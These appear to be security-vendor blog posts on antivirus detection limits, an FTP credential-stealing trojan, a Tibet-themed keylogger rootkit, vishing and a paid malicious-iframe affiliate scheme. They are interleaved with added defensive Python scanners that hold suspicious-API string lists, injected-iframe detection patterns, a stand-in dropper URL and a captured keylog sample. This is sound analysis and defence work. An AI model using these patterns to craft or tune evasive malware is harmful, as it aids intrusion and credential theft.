Generic and Heuristic detection is certainly better at picking up unknown threats than simple signature-based scanning, but there are three things that limit it. For one, it’s still reactive, basing detection on known bad techniques. Secondly, it’s static - obfuscation can still muck up the detection, if it causes the file to deviate from the known bad technique. Finally, there’s still a need for these detections not to be false-prone. Heuristics and generics essentially cover known “really, really bad” techniques. The threshold of badness must be quite high to make it into AV products. Consider how many commercial products and widely used administration tools blur those lines, and you may come to appreciate what a very fine line it is.
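To make the three limits above concrete, here is an added example (not from the original post and not any vendor's engine): a toy static scanner with an exact-hash signature, a byte-pattern signature, and a string-count heuristic, run over constructed byte strings standing in for a known sample, a repacked variant, an XOR-obfuscated variant, and a benign installer. The sample bytes, the suspicious-string list, the threshold and the signature name are all assumptions made for the demonstration.

```python
"""Added example (not from the original post): a toy three-layer static scanner
showing why an exact signature misses a modified sample, why a byte pattern
survives repacking but not obfuscation, and why a heuristic needs a high
threshold. Every sample here is a constructed byte string, not real malware."""
import hashlib

# Strings that together suggest a downloader persisting via the Run key.
# Any one of them also appears in plenty of legitimate installers, which is
# why the heuristic only fires when several occur together (assumed list).
SUSPICIOUS_STRINGS = [
    b"URLDownloadToFileA",
    b"WriteProcessMemory",
    b"CurrentVersion\\Run",
    b"SetWindowsHookExA",
]
HEURISTIC_THRESHOLD = 3  # assumed: three or more co-occurring strings

# Constructed "known" sample: a fake header followed by a string table.
KNOWN_SAMPLE = (
    b"MZ\x90\x00PE\x00\x00"
    + b"\x00".join(SUSPICIOUS_STRINGS)
    + b"\x00http://dropper.example.invalid/update.exe\x00"
)

# Layer 1: exact hash of the known sample.
KNOWN_HASHES = {hashlib.sha256(KNOWN_SAMPLE).hexdigest()}
# Layer 2: a distinctive byte pattern taken from the known sample (name is made up).
PATTERN_SIGNATURES = {"Constructed.Dropper.A": b"dropper.example.invalid/update.exe"}


def xor_obfuscate(data: bytes, key: int = 0x5A) -> bytes:
    """Simple XOR 'packing' of a string table; a real program decodes it at run time."""
    return bytes(b ^ key for b in data)


def scan(sample: bytes) -> dict:
    """Run all three static layers and report which ones fire."""
    hash_hit = hashlib.sha256(sample).hexdigest() in KNOWN_HASHES
    pattern_hits = [name for name, pat in PATTERN_SIGNATURES.items() if pat in sample]
    score = sum(1 for s in SUSPICIOUS_STRINGS if s in sample)
    return {
        "hash": hash_hit,
        "pattern": pattern_hits,
        "heuristic_score": score,
        "heuristic": score >= HEURISTIC_THRESHOLD,
    }


# Variant 1: identical code plus one appended byte; no longer "known" by hash.
VARIANT_REPACKED = KNOWN_SAMPLE + b"\x00"
# Variant 2: string table XOR-encoded; nothing is visible to a static scan.
VARIANT_OBFUSCATED = KNOWN_SAMPLE[:8] + xor_obfuscate(KNOWN_SAMPLE[8:])
# A constructed benign installer that legitimately downloads and registers itself.
BENIGN_INSTALLER = (
    b"MZ\x90\x00PE\x00\x00URLDownloadToFileA\x00CurrentVersion\\Run\x00"
    b"https://vendor.example/setup.exe"
)


def demonstrate() -> dict:
    """Scan each constructed sample and return the per-layer verdicts."""
    return {name: scan(s) for name, s in [
        ("known", KNOWN_SAMPLE),
        ("repacked", VARIANT_REPACKED),
        ("obfuscated", VARIANT_OBFUSCATED),
        ("benign", BENIGN_INSTALLER),
    ]}


if __name__ == "__main__":
    for name, result in demonstrate().items():
        print(f"{name:11s} {result}")
```

The repacked variant defeats only the hash; the obfuscated variant defeats all three static layers, which is the gap that emulation and behavioral detection are meant to close; and the benign installer shows why the heuristic threshold has to sit above the string count of ordinary administration tools.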

It’s not clear from what I’ve seen whether the contest’s judges intend to use the most paranoid settings available within the various products, but their description does seem to indicate they’ll only use the static detection, rather than running the samples in real time through the products. This does not fully test the products’ capabilities; it only tests one component. The results they get will not be what an average user will get.

The contest organizers and participants are playing with fire in order to prove what we already know: Signature-based scanners are meant to protect against known threats. That doesn’t mean that AV is dead, or that it’s useless. The industry is evolving, and its products with it. AV is intended to be one tool in a complete security arsenal. Defense in depth is where it’s at, if you’re really looking to protect your network.

Security Myths

There have been a couple of threads lately, one on LifeHacker, one on Ask Metafilter, about whether it’s necessary to use anti-virus software. The comments in both are a very clear indication on how far we have to go in educating users on the real danger of malware. It would appear the average user is operating under assumptions that might have been true 8 years ago. Now, it’s just a recipe for disaster.

The erroneous assumptions are that:

1) Viruses are noisy/easily visible and
2) Viruses are caused by actively bad behavior

To quote What the Geek from the LifeHacker thread,


    I have a business client whose website was giving people a trojan for a while because it got hacked - and guess what? if you didn’t have an AV running, you’d never know that it happened. It would just sit on your computer sending your data off to who knows where silently. Just because it doesn’t give you a big skull and crossbones on the screen doesn’t mean it isn’t there.

This really sums up the situation for me - an innocent user was hacked, and might never have known it, as it was silent. It’s like the difference between the demos we give of an “average scary virus” now versus the ones we gave 10 years ago. Back then, the demos were all skulls and message-boxes and file corruption and deletion. Very spooky, very visual and very loud. Now the scary demos are effectively silent. The malware can come in without any user interaction, and you’d never know it was there without specific tools to show you what changes it’s making behind-the-scenes. Off goes your credit card number and your private documents, without you being the wiser.

And this is not something that just happens in the “bad parts” of the internet. Think of the most innocuous content on the internet. Pictures of cute and fluffy animals would certainly qualify, right? At the end of last year, CuteOverload fell victim to a hacking that delivered trojans to its unsuspecting readers. And major sites are supposed to be safe, right? How about the Superbowl website hack from the beginning of last year?

One point that I think needs bringing up specifically is the question of whether to use “on-access” scanning, or if “on-demand” is enough. As Dwroth succinctly put it in the LifeHacker thread:


    All time (active protection) = good for the public, but overkill for the geek.

Turning off on-access scanning has never been a great idea, but now it could be a catastrophically bad idea. We’ve already discussed how one’s level of geekiness does not figure into one’s susceptibility to viruses which don’t require human interaction. Personally, if there’s a virus trying to get onto my computer, I’d really rather find out immediately before any changes could be made to my system rather than some time tomorrow or later this week.

A few minutes is plenty of time for malware to transmit my most sensitive data, why give it hours?

Password stealing trojan with dash of FTP and a hint of parasite

Clear-text protocols such as FTP or SMTP are unsafe. Anyone on the subnet can easily collect usernames and passwords just by sniffing the network traffic. Even switched networks can be attacked to redirect traffic and gather credentials as simply as on a hub-based network. However, FTP is still widely used and often the only protocol provided by hosting providers, and it’s for this reason we weren’t so surprised to come across PWS-FerTP, a piece of malware that takes advantage of this situation, collecting FTP credentials and infecting FTP repositories.

To slow down analysis, PWS-FerTP includes some (very simple) anti-debugging tricks and the VMware detection functionality shown below. It is not very stealthy though, relying on some well-known VMware internal mechanisms used mainly by VMware Tools to communicate with the host system.

PWS-FerTP bypasses the Windows Firewall (by modifying the registry) and starts to look for three widely used client applications providing FTP support (FAR Manager, CuteFTP and Total Commander). Indeed, these applications unfortunately use weak encryption to save FTP passwords, while other details such as logins and IP addresses are stored in the clear.

In an attempt to gather more FTP credentials, PWS-FerTP switches the first network adapter found on the system to promiscuous mode via the ioctlsocket API call, disabling MAC filtering and thus sniffing all FTP account details passing over the current subnet.
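The condition the sniffer exploits is visible to a defender in exactly the same traffic. As an added example (not from the original post and not McAfee tooling), the following audit walks a constructed FTP control-channel transcript and reports every session that authenticated in the clear, treating a successful AUTH TLS as the point after which nothing more is visible; the session ids, addresses and replies are constructed, and the report never contains the password itself.

```python
"""Added example (not from the original post, not McAfee tooling): an audit of a
constructed FTP control-channel capture that reports which sessions sent
credentials in the clear, the same condition PWS-FerTP's sniffer exploits.
The report deliberately never contains the password itself."""
import re

# Constructed transcript of three sessions: (session id, direction, line).
# "C" is client->server, "S" is server->client; addresses are documentation ranges.
CAPTURE = [
    ("10.0.0.5->203.0.113.9:21", "C", "USER webmaster"),
    ("10.0.0.5->203.0.113.9:21", "S", "331 Password required for webmaster"),
    ("10.0.0.5->203.0.113.9:21", "C", "PASS example-only-secret"),
    ("10.0.0.5->203.0.113.9:21", "S", "230 User webmaster logged in"),
    ("10.0.0.7->203.0.113.20:21", "C", "AUTH TLS"),
    ("10.0.0.7->203.0.113.20:21", "S", "234 AUTH TLS successful"),
    # From here on this session is encrypted: a sniffer sees only ciphertext,
    # so no USER/PASS lines ever appear in the capture for it.
    ("10.0.0.9->203.0.113.9:21", "C", "USER anonymous"),
    ("10.0.0.9->203.0.113.9:21", "S", "331 Please specify the password"),
    ("10.0.0.9->203.0.113.9:21", "C", "PASS guest@example.invalid"),
    ("10.0.0.9->203.0.113.9:21", "S", "230 Login successful"),
]

COMMAND = re.compile(r"^([A-Za-z]{3,4})(?:\s+(.*))?$")


def audit_ftp_sessions(capture):
    """Return one finding per session that authenticated over a clear-text control channel."""
    sessions = {}
    findings = []
    for sid, direction, line in capture:
        st = sessions.setdefault(sid, {"user": None, "tls": False, "tls_pending": False, "done": False})
        if direction == "S":
            # A 234 reply to AUTH TLS means the channel is encrypted from now on.
            if st["tls_pending"] and line.startswith("234"):
                st["tls"] = True
            st["tls_pending"] = False
            continue
        m = COMMAND.match(line)
        if not m:
            continue
        verb, arg = m.group(1).upper(), (m.group(2) or "").strip()
        if verb == "AUTH" and arg.upper() in ("TLS", "SSL"):
            st["tls_pending"] = True
        elif verb == "USER":
            st["user"] = arg
        elif verb == "PASS" and not st["tls"] and not st["done"]:
            user = st["user"] or "<unknown>"
            kind = "anonymous-login" if user.lower() in ("anonymous", "ftp") else "cleartext-credential"
            # Record that a password crossed the wire, never the password itself.
            findings.append({"session": sid, "server": sid.split("->", 1)[1], "user": user, "kind": kind})
            st["done"] = True
    return findings


if __name__ == "__main__":
    for finding in audit_ftp_sessions(CAPTURE):
        print(finding)
```

Anonymous logins are reported separately because they carry no secret; the first session is the one that matters, and the fix is the one the post closes with: FTPS/SFTP rather than plain FTP, so the PASS line never crosses the subnet in the clear.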

PWS-FerTP sends all gathered credentials within specially crafted HTTP requests to a remote web server.

But PWS-FerTP is more than a password stealer – a quick string search reveals some interesting blocks of obfuscated Javascript as well:

Once decoded, the aim of this script becomes much clearer: redirecting the user’s browser via an IFRAME HTML tag pointing to a malicious website.

In fact, PWS-FerTP connects to each previously gathered FTP account and looks for files whose names belong to this list:
- index.htm
- main.htm
- default.htm
- index.php
- main.php
- default.php

When such a file is found, PWS-FerTP retrieves it locally, injects the Javascript code shown above, and puts the file back on the FTP repository.
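A site owner can catch this rewrite with a baseline of the default documents listed above. The following is an added example (not the malware's code and not McAfee's tooling): it hashes every file with one of the six names under a web root, then reports any that are new or changed and whether they contain the hidden-IFRAME or obfuscated-script patterns typical of an injected redirect. The web root, its files and the injected content are constructed in a temporary directory; the pattern labels and the redirect hostname are assumptions.

```python
"""Added example (not the malware's code or McAfee's tooling): a baseline and
integrity check for the default documents PWS-FerTP is described as rewriting,
plus a content check for the kind of hidden IFRAME / obfuscated script it
injects. The web root and its files are constructed in a temp dir."""
import hashlib
import os
import re
import tempfile

# File names the post lists as the ones the malware rewrites.
TARGET_NAMES = {"index.htm", "main.htm", "default.htm", "index.php", "main.php", "default.php"}

# Patterns typical of an injected redirect; the labels are our own.
INJECTION_PATTERNS = {
    "hidden-iframe": re.compile(rb'<iframe[^>]*(?:width|height)\s*=\s*["\']?0\b', re.I),
    "invisible-iframe": re.compile(rb"<iframe[^>]*display\s*:\s*none", re.I),
    "obfuscated-script": re.compile(
        rb"(?:document\.write|eval)\s*\(\s*(?:unescape|String\.fromCharCode)\s*\(", re.I),
}


def sha256_of(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def target_files(root: str):
    """Yield (relative path, absolute path) for every default document under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() in TARGET_NAMES:
                full = os.path.join(dirpath, name)
                yield os.path.relpath(full, root).replace(os.sep, "/"), full


def build_baseline(root: str) -> dict:
    """Record one hash per default document while the site is known-good."""
    return {rel: sha256_of(full) for rel, full in target_files(root)}


def scan_webroot(root: str, baseline: dict) -> list:
    """Report default documents that are new or changed since the baseline, with any injection patterns found."""
    findings = []
    for rel, full in target_files(root):
        if rel in baseline and baseline[rel] == sha256_of(full):
            continue
        with open(full, "rb") as f:
            body = f.read()
        matched = [label for label, rx in INJECTION_PATTERNS.items() if rx.search(body)]
        findings.append({"path": rel, "status": "modified" if rel in baseline else "new", "patterns": matched})
    return sorted(findings, key=lambda finding: finding["path"])


def demo() -> tuple:
    """Build a constructed web root, baseline it, simulate an injection, rescan."""
    root = tempfile.mkdtemp(prefix="webroot-")
    os.mkdir(os.path.join(root, "blog"))
    with open(os.path.join(root, "index.htm"), "wb") as f:
        f.write(b"<html><body><h1>Welcome</h1></body></html>\n")
    with open(os.path.join(root, "blog", "index.php"), "wb") as f:
        f.write(b"<?php echo 'blog'; ?>\n")
    baseline = build_baseline(root)

    # Simulated tampering (constructed; not the malware's real payload).
    with open(os.path.join(root, "index.htm"), "ab") as f:
        f.write(b'<iframe src="http://redirect.example.invalid/" width=0 height=0></iframe>\n')
    with open(os.path.join(root, "main.php"), "wb") as f:
        f.write(b"<script>document.write(unescape('%3Cscript%3E'))</script>\n")
    return baseline, scan_webroot(root, baseline)


if __name__ == "__main__":
    _baseline, findings = demo()
    for finding in findings:
        print(finding)
```

Running the baseline from the hosting account itself is not enough on its own: the malware logs in with the same FTP credentials, so the baseline file should live somewhere those credentials cannot reach, and the hash comparison is the primary signal; the pattern match only explains what changed.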

Another good reason to follow well-known best practices: avoid clear-text protocols and use applications providing strong encryption, like KeePass, to store your credentials.

Is Malware Writing the Next Olympic Event?

A few days ago here at Avert Labs we received yet another interesting malicious file related to the now not-so-famous Tibetan situation. At first it looked like a simple Flash movie, at least judging from the icon. ;-)

Executing the file, called RaceForTibet.exe, shows a cartoon with a very skilled Chinese gymnast performing some amazingly convoluted exercise on a “vaulting box”, for which the jury immediately scores her a shocking 0! Whilst the gymnast’s performance is “re-wound,” a number of fairly stark photographs of real events, taking place throughout China and Tibet, are shown as a flashback.

As a malware researcher I just could not keep myself from looking further into the file to see if it was anything more than some political movie about events taking place in Tibet and China, especially after several recent posts [1] [2] discussing the Fribet Trojan.

Here are some screenshots of the cartoon that runs using “mini flash-player 2.6”:

(Screenshots: flash-tibet-1 through flash-tibet-6)

For the next step I decided to use our “Rootkit Detective” to check for hidden processes and hooks, and it turns out a number of files had been silently dropped on my PC!

So here comes the “Pro-Tibetan Movement rootkit”:

rtk-hooker-tibet

As you can see, a number of files are now on my system and completely hidden from “user-land”. The original file (RaceforTibet.exe) initially drops a file called “dopydwi.sys” in the %windir%\system32\drivers folder.

Here is an interesting part of this hidden system driver shown in IDA:

sys-driver-tibet

We can now start to see the bigger picture here! The rootkit is actually a keylogger posing as a political message; in fact you can notice above the call to the function “GetKeyboardState”.

Also below we can see the file is creating a device called “ServiceDll”, which will be used to load the driver:

create-dvc-tibet

And here we can see the patching of the SSDT, hooking a large number of Windows API functions by changing their address.

sdt-ida-tibet

The DLL file dropped on the system is going to be used to do the actual keylogging and it’s loaded through the device shown on the first IDA screenshot above.

To complete the picture, a hidden log file kept on the system (dopydwi.log) stores all the information gathered on the compromised machine.

Here is the output of a log file I captured:

[2008-04-10 07:14:53] Ethereal: Save file as [C:\Program Files\Ethereal\ethereal.exe] tibetan-capture
[2008-04-10 09:37:08] Save Image [C:\Program Files\GIMP-2.0\bin\gimp-2.2.exe] sdt-bigj
[2008-04-10 09:45:22] Mozilla Firefox Start Page - Mozilla Firefox [C:\Program Files\Mozilla Firefox\firefox.exe]
www.avertlabs.com
logtest.txt
[2008-04-10 09:46:24] Google - Windows Internet Explorer [C:\Program Files\Internet Explorer\iexplore.exe]
testing search engine
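For triage of a log like this one (which process was being watched, and which entries captured browser input such as URLs or search terms), here is an added example, not from the original post: a parser for the format shown above, fed the same log lines as constructed input. The browser list and the record layout are assumptions drawn from those lines.

```python
"""Added example (not from the original post): a parser for the keylogger log
format shown above, to triage what was captured and from which programs.
The sample below reuses the log lines from the post as constructed input."""
import ntpath
import re
from collections import Counter

SAMPLE_LOG = r"""[2008-04-10 07:14:53] Ethereal: Save file as [C:\Program Files\Ethereal\ethereal.exe] tibetan-capture
[2008-04-10 09:37:08] Save Image [C:\Program Files\GIMP-2.0\bin\gimp-2.2.exe] sdt-bigj
[2008-04-10 09:45:22] Mozilla Firefox Start Page - Mozilla Firefox [C:\Program Files\Mozilla Firefox\firefox.exe]
www.avertlabs.com
logtest.txt
[2008-04-10 09:46:24] Google - Windows Internet Explorer [C:\Program Files\Internet Explorer\iexplore.exe]
testing search engine
"""

# Header layout inferred from the sample:
# "[timestamp] <window title> [<exe path>] <optional text typed on the same line>"
HEADER = re.compile(
    r"^\[(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\] (.*?) \[([A-Za-z]:\\[^\]]*)\](?: (.*))?$"
)
BROWSERS = {"firefox.exe", "iexplore.exe", "opera.exe"}  # assumed list


def parse_keylog(text: str) -> list:
    """Group each header line with the typed lines that follow it."""
    records = []
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        m = HEADER.match(line)
        if m:
            ts, title, exe, inline = m.groups()
            records.append({"timestamp": ts, "title": title, "exe": exe,
                            "keys": [inline] if inline else []})
        elif records and line.strip():
            # Continuation line: keystrokes typed into the last window seen.
            records[-1]["keys"].append(line)
    return records


def triage(records: list) -> dict:
    """Count captured lines per process and isolate browser input (URLs, searches, logins)."""
    by_process = Counter()
    browser_input = []
    for r in records:
        name = ntpath.basename(r["exe"]).lower()
        by_process[name] += len(r["keys"])
        if name in BROWSERS and r["keys"]:
            browser_input.append(r)
    return {"by_process": by_process, "browser_input": browser_input}


if __name__ == "__main__":
    summary = triage(parse_keylog(SAMPLE_LOG))
    print(summary["by_process"])
    for r in summary["browser_input"]:
        print(r["timestamp"], r["title"], r["keys"])
```

On a real compromised host the browser entries are the ones to act on first, since anything typed into a login form or address bar after the drop date should be treated as exposed.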

The remote IP where this data is sent to is located in China (humorously enough).

So, while so much trouble is taking place, we continue to see an increase in attacks carried out by people taking advantage of the media hype and the interest raised across the globe by these dramatic circumstances.

Will you watch the Olympic games? Best not if they claim to appear via e-mail as a Flash executable movie! ;-)

‘Unsafe Hex’ About to Get More Costly?

A recent article in The Register seems to imply that if you’ve got out-of-date security software, any fraudulent charges to your accounts could suddenly be your liability. The advice given by the British Bankers’ Association includes much more than just the state of one’s security software; this could just as easily include misaddressing a check or falling victim to a phishing attack, among other things. On the other hand, it’s highly unlikely it would ever be worth the bank’s effort to invoke this clause.

From the Banking Code of the British Bankers’ Association:

    12.11 If you act fraudulently, you will be responsible for all losses on your account. If you act without reasonable care, and this causes losses, you may be responsible for them. (This may apply, for example, if you do not follow Section 12.5 or 12.9 or you do not keep to your account’s terms and conditions.)

These two sections offer quite a few bullet points about how not to be a victim of identity theft or financial fraud.

    12.5
    • Do not keep your checkbook and cards together.
    • Do not let anyone else use your card, and do not tell anyone else your PIN, password, or other security information.
    • Your bank or building society will never ask you for your PIN. If you are in any doubt about whether a caller is genuine or if you are suspicious, take the caller’s details and call us.
    • If you change your PIN, you should choose your new PIN carefully.
    • Try to remember your PIN, password, and other security information, and securely destroy the notice as soon as you receive it.
    • Never write down or record your PIN, password, or other security information.
    • Always take reasonable steps to keep your card safe and your PIN, password, and other security information secret at all times.
    • If your card issuer takes part in a secure online payment system (such as Verified by Visa or MasterCard SecureCode), consider signing up either at their Web site or whenever you are given the option while shopping online. This involves your registering a password with your card company; you will be asked for the password whenever you shop at an online retailer taking part in the scheme. You should keep this password secret.
    • Never give your account details or other security information to anyone unless you know who they are and why they need them.
    • Keep your card receipts and other information about your account containing personal details (for example, statements) safe and get rid of them carefully.
    • Take care when storing or getting rid of information about your accounts. People who commit fraud use many methods, such as “bin raiding” (a.k.a., dumpster diving) to get this type of information. You should take simple steps such as shredding printed material.
    • Be aware that your mail is valuable information in the wrong hands. If you don’t receive a bank statement, card statement, or any other expected financial information, contact us.
    • You will find the APACS Web site a helpful guide on what to do if you suspect card fraud.
    12.9
    • Keep your PC secure. Use up-to-date anti-virus and spyware software and a personal firewall.
    • Keep your passwords and PINs secret.
    • We (or the police) will never contact you to ask you for your online banking or payment card PINs, or your password information.
    • Treat e-mails you receive from senders claiming to be from your bank or building society with caution and be wary of e-mails or calls asking you for any personal security details.
    • Always access Internet banking sites by typing the bank or building society’s address into your Web browser. Never go to an Internet banking site from a link in an e-mail and then enter personal details.
    • Follow our advice: Our Web sites are usually a good place to get help and guidance on how to stay safe online.
    • Visit www.banksafeonline.org.uk for useful information.

But wait, there’s a caveat: They won’t invoke this willy-nilly:

    12.12 Unless we can show that you have acted fraudulently or without reasonable care, your liability for your card being misused will be limited as follows.

This code would be far too difficult and costly to implement in most cases. It would have to be a particularly large sum of money involved in the fraud, enough that it might be deemed worth the cost of an investigation, alienating a customer, and courting a heap of bad PR.

Although this is all good advice from the BBA, it looks like the assertion that people will suddenly be financially liable for having out-of-date security software is just a case of spreading FUD.

S.P.A.M. Experiment Update

Within the first 24 hours, participants in McAfee’s SPAM Experiment have already started to receive a wide range of spam. The U.S. economic crunch (bearing in mind I am NO economist ;-) ) may be having an effect on spam campaigns, as several of the recipients, browsing the Web and working independently of each other, have started to receive offers that center around guaranteed loans, credit cards, and debt relief.

The spam that isn’t offering money is trying to take it away from the participants. Three of our “victims” have already been targeted by phishers! It didn’t take long at all for some of their e-mail addresses to be picked up and exploited by fraudsters.

According to their blogs, some of the participants started to receive spam almost immediately after they clicked on pop-ups on the first day and provided their e-mail addresses for free offers! As usual with the free offers it turns out that it’s almost impossible to meet the conditions to get the free Xboxes, Wiis, iPods, iPhones, etc.

At the time of this writing, the overall spam submission counts have exceeded 550 from 17 of the participants. One participant alone has received more than 130 pieces of spam!

More to come during the next 29 days. Make sure you follow the participants’ blogs and stay tuned.

The S.P.A.M Experiment Kicks Off

Take equal parts e-mail, willing and daring participants, some shady ePharmacies (OK, OK–it’s Viagra), a few eCards, and a heavy dose of dubious business activities. Mix them together with just a sprinkle of reality TV (or blogging in this case) and you have The S.P.A.M Experiment, which launched this week.

Avert Labs invests considerable resources in fighting spam and in educating users about fighting it. Anyone who follows this blog certainly knows that. The purpose of this experiment, however, is quite different. It is to show spam for what it really is: dangerous. Spam is not just a nuisance. It’s a constantly evolving threat to our identities and our wallets, and it puts users at risk of far more than lost inbox space. To show spam for the threat it really is, we are actually having users do what we always tell them not to do!

Come on. You gotta admit it. It is very cool.

The S.P.A.M. Experiment is designed to show the scale of the spam problem and the risks associated with opening or responding to unsolicited e-mail. It will demonstrate just how resourceful and quick cybercriminals (and make no mistake here–spammers are criminals) are at creating new ways of evading anti-spam filters and relieving people of their money. The worldwide participants will share their experiences through blogging, so you will be able to follow the action as it develops. I recommend you subscribe to the many global feeds that are here. We started only earlier this week and the participants are already getting results!

Want to know why spam is dangerous? Want to see how spam links to cybercrime? We are gonna show you over the next 30 days.

Dial V for Vish

In a natural evolution of phishing, Internet scamsters are switching to “Vishing” — short for “voice phishing” in order to steal user information. Vishing combines the use of Voice over IP (VoIP) phones along with clever social engineering to gain access to personal and financial details of the victim by exploiting the perceived trust in traditional telephone services.

With increased user education about Internet scams, people are more aware of the fact that an e-mail containing a URL could be malicious in nature. Instead of using a misdirected Web link to some phony banking sites to steal user information, fraudsters are luring victims to something more credible like calling a toll free number and having an automated recording asking for account information.

Potential victims would get the usual convincing e-mail phish conjured to look like a genuine complaint. But instead of being directed to a website to resolve the pending issue, they are given a phone number to call. Those who call the “customer service” number are greeted with a pirated recording of an automated voice system for the targeted financial institution and are requested to enter their card number in order to authenticate. They are then led through a series of voice-prompted menus that ask for PIN codes, card expiration date, date of birth and other critical information. Once the victim enters these details, the visher has enough information to use it for identity theft and make fraudulent use of the information.

With the US tax deadline nearing, McAfee Avert Labs has observed a surge in IRS refund phishing attempts. In addition to the usual e-mail phish we also observed IRS vishing campaigns targeting VISA or MasterCard debit cards.

IRS Vish email

Here’s another example of a vish campaign targeting a well known bank.

Bank Vish email

Other variants of vishing use CallerID spoofing to make an incoming call appear to come from a 1-800 number, or send SMS messages purporting to be from a bank. A text or pre-recorded voice message then tells the victim that their account has been frozen due to suspicious activity. Because the incoming call displays a 1-800 number belonging to a recognized institution, it creates a false sense of security about the authenticity of the message.

Vishing is all set to flourish with advancements in Voice over Internet Protocol (VoIP) technology that enables cheap and anonymous Internet calling. Given the ease with which CallerID boxes can be tricked into displaying erroneous information, it is becoming increasingly difficult to distinguish phishing attempts from genuine attempts to contact customers.

If you encounter a vishing attempt and have a question concerning your account or card, please contact the financial institution only using a telephone number obtained from your account statement, a telephone book or other verifiable, genuine correspondence.

RussianCash

Last week, I read some interesting news on an Australian website The Age. A journalist explained that a Russian malware distribution site offered a haul of 1000 spyware-infected Australian machines for 100USD, double the price offered for US machines and 30 times more than those from Asia.

Searching this site, I discovered the InstallsCash partnership program:

It was the well-known dishonest offer: after registering, the affiliate had to put a short one-line iframe code on his website pages. Next, as explained in the FAQ, this hidden iframe silently redirected any visitor to another website, which installed the affiliation program’s software (via an MPack-like process). Each successful installation made from the affiliate’s site earned a payment.

To cover their tracks, the InstallsCash registrar is in China (bizcn.com), the fake registrant address is in the US (Iowa City) and the e-mail contact is in Russia (ydwrtyxamz_at_mail.ru). It is easy to see that this last name was randomly generated. We will surely encounter others in our investigations!

Being curious and to clearly demonstrate the dishonesty of the offer, I decided to subscribe myself by using some fake data to fill in the proposed form:

This screenshot is interesting; it lists the allowed system of payments. Here we recognize all the regular ones the cybercriminals are using. Having done that, I had to wait for 24 hours:

On Saturday, after waking up, I tried my luck and attempted a connection. They had activated my registration and my personal iframe code was waiting for me:

As I discussed first, the iframe I had to hide on my website pointed at another website with a strange, randomly chosen name, created with a more or less automated method I discussed in a previous blog entry. It seems the affiliator creates or uses a different one for each affiliate. Thanks to these unique names, the software recognizes each of them, data can be fed into their stats page, and the payments can then be calculated.

On my personal page, the top white window contained my iframe. In the middle, the affiliator gave me the same one in an encrypted form. It was not explained, but it was clear I had to use this one on my pages to mislead or evade some security technologies. The distributor goes so far as to say, and I quote, “they will be updating every 3 days and they will be invisible for every antivirus!”
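The hidden iframe described above, as an added example that is not part of the original post and not the affiliate program’s own code: a small Python scanner that flags iframes a page would never display, both the plain zero-size tag an affiliate was asked to paste in and the document.write(unescape(...)) form that the “encrypted” version commonly takes. The sample page and every host name in it are constructed for the example (.invalid addresses); the real affiliate domains are not reproduced here.

```python
"""Flag hidden and obfuscated iframes in a web page.  Added example, not code
from the original post or from the affiliate program it describes.  The sample
page and all host names below are constructed (.invalid TLD)."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# document.write(unescape("%3Ciframe...")) is one common way to hide the tag
# from a plain-text scan of the page source.  Only %XX escapes are decoded
# here; JavaScript's %uXXXX form is left alone.
UNESCAPE_CALL = re.compile(r"""unescape\(\s*["']([^"']+)["']\s*\)""")


class IframeFinder(HTMLParser):
    """Collect the attributes of every <iframe> seen by the parser."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lower-cases tag and attribute names.
        if tag == "iframe":
            self.iframes.append({name: (value or "") for name, value in attrs})


def _is_tiny(value):
    """True for width/height values such as 0, 1, 0px or 1px."""
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= 1


def find_hidden_iframes(html):
    """Return a list of (src, reason) for iframes the page would not display.

    Both the plain tag and any tag rebuilt from a document.write(unescape(...))
    call are examined; reason is "zero-size" or "css-hidden".
    """
    finder = IframeFinder()
    finder.feed(html)
    # Decode the obfuscated payloads and run them through the same parser.
    for encoded in UNESCAPE_CALL.findall(html):
        finder.feed(unquote(encoded))
    finder.close()
    hits = []
    for attrs in finder.iframes:
        src = attrs.get("src", "")
        if _is_tiny(attrs.get("width")) and _is_tiny(attrs.get("height")):
            hits.append((src, "zero-size"))
        elif HIDDEN_STYLE.search(attrs.get("style", "")):
            hits.append((src, "css-hidden"))
    return hits


# Constructed page: one legitimate frame, one affiliate-style 0x0 frame and one
# frame delivered through unescape() with display:none.
SAMPLE_PAGE = """<html><body>
<p>Welcome to my site</p>
<iframe src="http://video.example.invalid/player" width="300" height="200"></iframe>
<iframe src="http://affiliate.example.invalid/in.cgi?3" width="0" height="0" frameborder="0"></iframe>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A//obf.example.invalid/x.php%22%20style%3D%22display%3Anone%22%3E%3C/iframe%3E"))</script>
</body></html>"""

if __name__ == "__main__":
    for src, reason in find_hidden_iframes(SAMPLE_PAGE):
        print(f"{reason:10s} {src}")
```

Run on the sample it reports the 0x0 affiliate frame and the display:none frame and stays silent on the 300x200 player. The affiliate note that the encoded version “will be updating every 3 days” is exactly why the decode step matters: a scan that only looks for the literal string iframe in the page source misses the rotated variants, while decoding and parsing them catches whatever the payload finally becomes.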

The whois gave me the result I expected, which was something similar to InstallsCash.com:

Registrar was bizcn.com and registrant contact came with another improbable e-mail address:
Jan Dendinger ycsmmiqtyo_at_mail.ru
Phone +1 3196433xxx Fax: +13.196433xxx
309 East Main Street
West Branch IA 523581
us

Some quick searches with Google allowed me to find many other similar sites.

I looked at my stats page. Of course it was blank:

Where The Age announced $100 per 1000 unique loads, my rate table quoted half that, and only $3 for Asia:

But the journalist was right: in my private message window as well as on the main page I could read that InstallsCash had made a special offer since February 16th: they increased their rates “for USA by 2 and any mix of country was about 30$”:

However, I note the price is still low compared with the payments these guys proposed in September 2006. At that time, Australian and UK PCs were the most wanted:

Yes, it seems that the same people are hidden behind InstallsCash, IframeCash (September 2006) and IframeDollars (November 2007). To see this you can, for example, compare the FAQs:

In November 2007, the RBNExploit blog discussed the possibility that iFrameCash and iFrameDollars were linked to the Russian Business Network. This confirms that RBN trading partners are still in business. And if they offer commissions for deliberately planting malicious iframes, as they have been doing for several years, believe me, it is because it is a lucrative business.

